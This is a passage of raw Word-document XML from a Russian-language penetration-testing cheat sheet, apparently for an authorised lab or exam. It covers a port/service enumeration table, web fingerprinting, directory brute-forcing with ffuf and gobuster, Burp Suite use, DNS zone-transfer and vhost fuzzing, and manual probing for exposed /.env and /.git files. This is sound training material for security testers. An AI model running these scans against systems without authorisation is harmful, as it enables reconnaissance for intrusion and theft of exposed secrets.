          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>banner, аутентификация</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>25/587</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>banner, конфигурация</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>dig, AXFR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>80/443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>HTTP(S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Burp, curl, ffuf, vhosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>139/445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>shares, null session, enum4linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>161/UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SNMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>community, snmpwalk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>389/636</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LDAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Base DN, bind</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>версия, доступ, конфиги</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>3389</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>RDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>версия, credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>5432</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>версия, credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8080/8443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Web/Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>отдельно исследовать</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Web Pentest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 Fingerprint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -I http://$TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Получает HTTP-заголовки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>curl -k -I https://TARGET для TLS с проблемным сертификатом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -i http://$TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Заголовки + тело ответа.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>curl -v — подробности запроса.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>whatweb http://$TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Определяет технологии приложения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>whatweb -a 3 URL — глубже.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nikto -h http://$TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Ищет типовые проблемы конфигурации веб-сервера.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Используй как triage, не как единственный инструмент.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl http://$TARGET/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверяет robots.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Также sitemap.xml.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 Content discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Перебирает пути.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Начинай с короткого списка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Более широкий поиск директорий.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Дольше, но покрывает больше.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ffuf -u http://$TARGET/FUZZ -w WORDLIST -e .php,.html,.txt,.bak,.zip,.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Ищет пути с расширениями.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Подбирай расширения по технологии.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>gobuster dir -u http://$TARGET -w /usr/share/seclists/Discovery/Web-Content/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Альтернативный directory brute-force.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>gobuster dir -x php,txt,bak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>feroxbuster -u http://$TARGET -w /usr/share/seclists/Discovery/Web-Content/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Content discovery с рекурсией.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Удобен для вложенных директорий.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Вручную проверяй: /admin, /login, /api, /backup, /config, /test, /dev, /debug, /uploads, /.git/HEAD, /.env, /server-status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Практическая схема: браузер на ALT → Burp Suite на ALT. Kali используется для сетевого сканирования и вспомогательных инструментов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Proxy/HTTP history — собрать карту приложения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Repeater — вручную менять и повторять запрос.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Intruder — автоматизировать перебор параметров в разрешённом стенде.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Decoder — base64/URL и другие кодировки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Comparer — сравнить ответы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Login checklist: endpoint, метод, параметры, CSRF, cookies, redirects, различия ошибок, lockout/rate-limit, default credentials, IDOR/BOLA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. DNS / VHost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>dig $DOMAIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Получает DNS-записи.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>dig A/AAAA/MX/TXT DOMAIN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>dig axfr @$TARGET $DOMAIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверяет zone transfer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>При успехе можно получить список DNS-имён.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>echo '$TARGET $DOMAIN' | sudo tee -a /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Локально связывает IP и FQDN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Можно добавить shortname: IP fqdn shortname.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ffuf -u http://$TARGET/ -H 'Host: FUZZ.'$DOMAIN -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Ищет виртуальные хосты через Host header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Используй только домен из задания.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. SSH / FTP / SMB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.1 SSH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nmap -sC -sV -p22 $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
